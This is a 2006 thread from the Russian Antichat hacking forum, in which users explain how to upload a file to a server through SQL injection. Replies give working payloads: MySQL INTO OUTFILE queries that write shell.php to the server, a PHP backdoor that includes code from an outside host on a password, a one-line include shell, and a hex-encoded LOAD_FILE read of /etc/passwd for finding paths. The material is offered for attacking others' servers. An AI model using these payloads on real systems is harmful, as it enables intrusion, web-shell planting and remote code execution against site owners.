Форум АНТИЧАТ - Помогите с Sql

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите с Sql (https://forum.antichat.xyz/showthread.php?t=29308)

TAZMAD

17.12.2006 18:20

Помогите с Sql

Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql. :)

Зарание благодарен....

InferNo23

17.12.2006 18:28

select 'file_content' INTO OUTFILE '/путь'

GreenBear

17.12.2006 18:29

outfile

Код:



SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';

blackybr

17.12.2006 18:58

Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде

PHP код:


		
			
<? 

if ($_POST ['someshit'] == "killme")

{

include ("http://someshit.nm.ru/br/s.php");

} 

else 

{

die;

}

?>

а уже после делать то что написал Green_Bear =)

nc.STRIEM

18.12.2006 01:47

а не проще ли сделать

Код:

SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';

}{0TT@БЬ)Ч

18.12.2006 04:05

а если путь не известен?

guest3297

18.12.2006 07:09

Цитата:

а если путь не известен?

То узнай его...

}{0TT@БЬ)Ч

18.12.2006 22:18

Цитата:

Сообщение от [ cash ]

То узнай его...

Как если ошибка не выводится?

SQLHACK

18.12.2006 22:40

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &

guest3297

19.12.2006 05:07

}{0TT@БЬ)Ч
Что мешает phpinfo другие файлы с выводом ошибок пройтись по cgi посмотреть другие сайты на этом же хостинге провести аналогию..

Время: 06:15

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице